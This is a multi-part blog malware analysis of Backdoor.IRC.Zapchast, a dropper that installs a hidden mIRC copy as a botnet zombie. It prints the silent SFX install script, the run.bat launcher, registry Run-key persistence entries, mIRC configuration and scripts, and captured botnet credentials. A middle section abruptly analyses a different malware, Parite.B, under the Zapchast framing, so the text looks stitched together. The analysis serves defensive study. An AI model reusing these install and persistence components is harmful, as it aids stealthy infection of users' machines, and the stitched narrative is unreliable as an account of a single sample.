Skip navigation.
Home

Backdoor.IRC.Zapchast - mIRC used as Zombie - Reversing Malicious Network-IRC Activity

In this blog post we are going to Investigate the malicious network activity of a still-alive Backdoor-Zombie called Backdoor.IRC.Zapchast, here a little summary of its functionalities:

* Changes security settings of Internet Explorer
* Survives to System Restart
* Creates various copies of itself into Windows directory
* Produces other Processess
* Join to IRC Network, This is the most interesting functionality

This last functionality is the most interesting, indeed the post is focussed on Network Activity of Backdoor.IRC.Zapchast. When a malware presents the ability to connect itself to an Irc Server, we are in presence of a Zombie, a malicious entity that is part of a Botnet. By analyzing this kind of malware we can obtain truly interesting informations on the involved Botnet, because at a certaint point of infection and successive packet exchange will be sent Irc Server Credentials that are necessary to identify and trust the Zombie itself. Here a little compendium of informations that we can obtain:

* Involved malicious domains
* IRC Servers used with their credentials
* Botnet structure
* Via infiltration we can gain other informations on network struct
* Malicious Files Downloaded, with relative Provenience
* Stolen Data

When we have an application like IRC.Zapcast we can follow two ways:

* Network Packet Dissection (fast, great for Evidence Collection, some information lost)
* Binary Pure Reverse Engineering (the classical way, complete knowledge but slow)
* Mixed Approach

We will follow the Mixed Approach, that involves in analyzing via direct reverse code engineering the general anatomy of the backdoor, understand how happens infection, how evolves and mostly what component affects, successively we will proced with Packet Analysis to carve out all useful informations.

Now let's take a look to the malicious binary..

FileName: hellmark.exe
FileInfo: RAR SFX
MD5: 9AA2DFAD668A9B6FACF78AF925DB0B23

The application is compressed with Rar SFX, these kind of executables are SelfExtracting .rar archives. Usually these executable contains a collection of files and an SFX Script that manages uncompressing. Like every packed executable we can unpack and separately extract each file contained inside. In our case the malicious binary is only RAR-SFXed and does not presents apparently other encryption layers, this mean that we can explore directly the executable with a Rar Management Tool, like AnyRAR, that supports .exe unpacking.

We can suddenly see that hellmark.exe embedds the following files:

1. a.reg
2. aliases.ini
3. com.mrc
4. control.ini
5. fullname.txt
6. ident.txt
7. mirc.ico
8. remote.ini
9. run.bat
10. s.mrc
11. servers.ini
12. spoolsv.exe
13. users.ini
14. xmas.jpg

As you can see these files seems to be strictly releated to Malicious IRC Activity (ident.txt, s.mrc, com.mrc etc.). The executable contains also an SFX script, that is automatically decoded by AnyRAR, let's see what this script does

Path=C:\Windows\temp\spoolsv\
SavePath
Setup=C:\Windows\temp\spoolsv\run.bat
Silent=1
Overwrite=2

The malicious code is effectively installed into Windows\temp\spoolsv\ by using a .bat script called run.bat and entire process is done Silently, without advising the user. Now let's extract all tese files and inspect the content.
The first file that we are going to inspect is run.bat, here is the content:

@ECHO OFF
START regedit /s %SystemRoot%\Temp\spoolsv\a.reg
START %SystemRoot%\temp\spoolsv\spoolsv.exe
START %SystemRoot%\temp\spoolsv\xmas.jpg
START attrib +H +S %SystemRoot%\temp\spoolsv

Without prompting operations to the user, calls a.reg a file that modifies Windows Registry successively launches spoolsv.exe and launches xmas.jpg and finally changes attributes to spoolsv so the file will became hidden. This is the backdoor installer, now let's see the Registry Changes that we have by inspecting a.reg:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
"AppDirectory"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""
[HKEY_CURRENT_USER\Software\mIRC]
[HKEY_CURRENT_USER\Software\mIRC\Channels]
[HKEY_CURRENT_USER\Software\mIRC\License]
@="--------"
[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="------"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolsv"="\"C:\\Windows\\temp\\spoolsv\\spoolsv.exe\""

These registry keys adds the malicious spoolsv.exe to svchost entry and registers (license key + username) mirc copy, successively spooksv.exe is registered between run applications, this last operation assures that the malicious client is executed at every System Start.

Now it's time to fastly inspect this malicious client, called spoolsv.exe, in the usual way we firstly examine the PE Structure and next Disassemble it.

Between files informations we can see:

CompanyName: mIRC Co. Ltd.
FileVersion: 6.03
InternalName: mIRC
LegalCopyright: Copyright © 1995-2002 mIRC Co. Ltd.
LegalTrademarks: mIRC® is a Registered Trademark of mIRC Co. Ltd.
OrignalFilename: mirc.exe
ProductName: mIRC

SHA-1: 33CDFE6F7FA6B321F9A51CC051C32BA924164B10

We land to a truly interesting discovery here, an harmless copy of the well known client IRC mIRC is used as Botnet Zombie and Backdoor. That sounds really interesting, because a direct detection approach will cause FP (False Positive) problems. What is going to differentiate the malicious mirc edition to the good one is the presence of the various mirc scripts.

In .txt and .ini we can see IRC ident credentials and a list of adopted servers.

fullname.txt contains a collection of statements like these:
weed? hmmm? ok!
Stoned!
boom biddy bye bye
i love drugs
jamaica
skunk + blunt = special joint :-)

ident.txt
dream
dreaming
roz
dreamer
cry
die
love
sweet
kiss
ana
anca
dana
corina
Monica

users.ini we can see 10 users
n1=100:*!*@b---.com
n2=100:*!*@f-----rnet.org
n3=100:*!*@fina----dernet.org
n4=100:*!*@C---rs.undernet.org
n5=100:*!*@Ihate---dernet.org
n6=100:*!*@Bo----ush.biz
n7=100:*!*@ite---ernet.org
n8=100:*!*@m-net.org
n9=100:*!*@ra----net.org
n10=100:*!*@jus-------net.org

servers.ini there are 33 server listed

n1=CoolSERVER:i------iz:6667GROUP:Cool
n2=CoolSERVER:help----h.com:6667GROUP:Cool
n3=LelystadSERVER:Lely------Net.Org:6667GROUP:Undernet
n4=HelsinkiSERVER:Hels-ernet.Org:6667GROUP:Undernet
n5=Mesa2SERVER:M-rnet.Org:6667GROUP:Undernet
n6=BudapestSERVER:Buda-rNet.Org:6667GROUP:Undernet
n7=TampaSERVER:Tam-rnet.Org:6667GROUP:Undernet
n8=ZagrebSERVER:Za-derNet.Org:6667GROUP:Undernet

finally it's interesting to inspect mirc.ini settings

[dde]
ServerStatus=off
ServiceName=svchost
CheckName=off
..
accept=*.jpg,*.gif,*.png,*.bmp,*.txt,*.log,*.wav,*.mid,*.mp3,*.wma,*.ogg,*.zip
ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
user=X
nick=X
anick=X
email=X
host=D-rnet.ORG:6669GROUP:Undernet
[files]
servers=servers.ini
finger=finger.txt
urls=urls.ini
addrbk=addrbk.ini
trayicon=mirc.ico
[afiles]
n0=aliases.ini
[rfiles]
n0=users.ini
n1=remote.ini
n2=com.mrc
n3=s.mrc

An interesting option is the hide=1 style, this will make a stealth execution of mirc. Now analysis prosecutes with analysis of the involved mirc scripts:

* com.mrc
* s.mrc

s.mrc manages Silence:

on *:open:?:{
inc -u3 %msg.floodpro 1
if (%msg.floodpro == 2) {
ame 2Message 4Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
silence +*!*@*
timerunsilence 1 60 silence -*!*@*
close -m
}
}

on *:notice:*:?:{
if (%notice.floodpro.nick != $nick) {
inc -u3 %notice.floodpro 1
}
if (%notice.floodpro == 2) {
ame 2Notice 4 Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
silence +*!*@*
timerunsilence 1 60 silence -*!*@*
}
set %notice.floodpro.nick $nick
}

ctcp *:*:?:{
if (%ctcp.floodpro.nick != $nick) {
inc -u3 %ctcp.floodpro 1
}
if (%ctcp.floodpro == 2) {
ame 2CTCP 4 Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute
silence +*!*@*
timerunsilence 1 60 silence -*!*@*
}
set %ctcp.floodpro.nick $nick
}

on *:invite:#:{
if (%invite.floodpro.nick != $nick) {
inc -u3 %invite.floodpro 1
}
if (%invite.floodpro == 2) {
ame 2Invite 4 Flood 2 Detected, 2 Activating 4 Silence 2 for 12 1 2 minute

silence +*!*@*
timerunsilence 1 60 silence -*!*@*
}
set %invite.floodpro.nick $nick
}
on *:notice:*:#:{ hinc -mu2 spam $chan | if $hget(spam,$chan) >= 3 { mode $me +d | timerunsilence 1 60 mode $me -d | ame 2Modul 4 +d 2 este activat din cauza 4 floodului 2 pt 4 1 min 4 sa va trag la muie

com.mrc is a bit longer that s.mrc and as the name suggests it manages communication with the botnet, in other words it takes from all previously seen .txt and .ini files informations to build an ident profile for each IRC Server contained in the list.

In the next episode we will analyze deeply com.mrc and perform a direct analysis of how this malicious version of mIRC is used to see what effectively happens inside these malicious Servers/Channels, we will also follow the Packet Analysis way an analyze network active via Wireshark.

This is matter for anorher episode.. =)

This time we will move our point of view at the immediate post infection instant, the point where Parite.B attempts to enstablish a networked communication with an IRC Server and two Websites.

The best approach to discover and define network features is to use a packet capture system, like Wireshark, into a well controlled environement, Vmware or VirtualBox is perfect, just remember if you are not sure of the capilities that your malware have, to correctly protect transactions between Host and Guest Systems.

When environement is ready, run Wireshark and watch the traffic dumped when the system is at rest, what is dumped at this point is a further annoyance into the Malware Activity PCAP, so be smart enough to build the appropriate packet filtering rules.

Now you can run Parite.B, just wait some moment and wireshark will do his work. Just a note, if you dissect today network activity of this Parite variant, many informations are lost, because malicious server has changed.

Here some Evidence of Parite Network Activity:

http://2.bp.blogspot.com/_8XESv__n8f4/S5NmQVxPX_I/AAAAAAAAACk/8nYDBgUklPM/s640/DNS.jpg

As you can see here we have two DNS Queries (type DNS_TYPE_A ) about two domains, that are correctly resolved. Successively we can see some Http Request performed on the first domain:

http://4.bp.blogspot.com/_8XESv__n8f4/S5NnvQo1bZI/AAAAAAAAACs/JV_T4RFja6k/s640/Http_Rq.jpg

Our malicious binary requests a malicious file called imag1.gif and successively mais1.php

This confirm the Download functionality of Parite, now we are also able to build a Blocking Rule for this malicious Domain. By inspecting further activities we can carve the following truly interesting informations:

Parite.B attemps to connect to:

195.202.- 80
221.143.- 80
66.40.- 21

Plus, by watching traffic produced to reach an Irc Server, we can isolate the following Credential:
USER clamar42

From port 21 traffic, we can carve the following password:

PASS 9136499

Another important thing to not forgot is to watch the HOST file, usually this king of malware adds URL to IP mappings. Obviously you need to know the HOST file, BEFORE and AFTER infection, with a basilar differentiation between these two events, suddenly we detect two domains that are certainly inserted by Parite:

127.0.0.1 www.-----.com.br
127.0.0.1 www.------.com.br

These domains came from Brasil and belongs to Brasilian Banking Services.

In the next post we will see how works the malicious dll previously encountered in previous posts.

Finally we land to the Third and last episode of Backdoor.IRC.Zapchast Analysis.
As you have previously seen mIRC is connected with some malicious IRC Server, the victim that executes hellmark.exe fill join to certain channels and idle until an Admin User decides how to use this Zombified Victim, usually the most used activity is to download other malicious applications on the victim.

In this post we are going to deeply inspect the network activity of an infected machine, we will use Wireshark in a precisely scheduled way. For each User Event we will build a different log, in this way:

* During Infection
* Infected Victim
* At every daily restart of infected machine

Most interesting results are given by prolonged observation planned in a daily basis. The first two Events are not necessary to be reported here because we already seen directly how this happens, we will focus directly on an Active Usage of the Backdoor happened some day ago. But before starting, here a screenshot of how appears 'usual activity'

First One:

http://2.bp.blogspot.com/_8XESv__n8f4/S5u-E5ml6sI/AAAAAAAAADM/MnkO-crogDc/s640/irc_activity1.jpg

Second One:

http://3.bp.blogspot.com/_8XESv__n8f4/S5vGZ7nWLrI/AAAAAAAAADc/OMmr1ydk2Yo/s640/irc_act2.jpg

We can distinguish a PING - PONG activity, usual of every IRC Connection.

Finally here we have a tipical channel activity:

http://1.bp.blogspot.com/_8XESv__n8f4/S5vL8KI7OyI/AAAAAAAAADs/L_liFdoeIrA/s640/chan_act.jpg

As you can see an Administrator sends commands to an infected victim (the Zombie) in this case adds some auser address.

Here ends the paper, I'll prosecute with daily investigations on this Network and if something interesting comes up, I'll publish here..

Regards,
Giuseppe 'Evilcry' Bonfa